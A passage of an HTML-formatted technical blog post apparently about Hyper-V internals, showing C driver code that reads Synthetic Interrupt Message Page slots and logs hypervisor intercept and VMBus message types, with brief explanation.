<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">notification message is sent through the 1st SIM slot</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage1 = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PUINT8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum] + </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_MESSAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">); </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//for SINT1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage1->Header.MessageType != 0){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"SINT1 interrupt"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">depending on the type of message handlers call procedures</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//patterns for each message type are described in TLFS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">switch</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage->Header.MessageType)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64IoPortIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintIoPortInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeNone:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvMessageTypeNone"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64MsrIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintMsrInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64CpuidIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintCpuidInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64ExceptionIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintExceptionInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">default</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Unknown MessageType"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvMessage->Header.MessageType);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function gets the number of active logical processor, the address of the page SIM and reads the value of the zero slots SIM it will first analyze the message type phvMessage->Header.MessageType, because the message body for each type is different. In DbgView you can see the following picture:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh3.googleusercontent.com/f2XUN171nPLbcZCjvbovH9aqhJYfH6eAptCj41wnfHXakLcA-o4lyiuzHt9ZKUD3e5g0RBphAlI3VqE0gAXamPeYLFSUp_b_WqX1QhCUCzVqf8d-wTR4ubk0pqip2A5bmgmv-jumjCOyIc_I" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="483" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseVmbusMessage(</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">size_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">index</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the number of the active logical processor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uCurProcNum = KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvMessage4;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVMBUS_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvmbMessage;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[uCurProcNum] != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the pointer to the 4-th slot SIM</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage4 = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PUINT8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum] + </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_MESSAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> * 4);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//DbgLog("Hv interrupt vector index", index);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
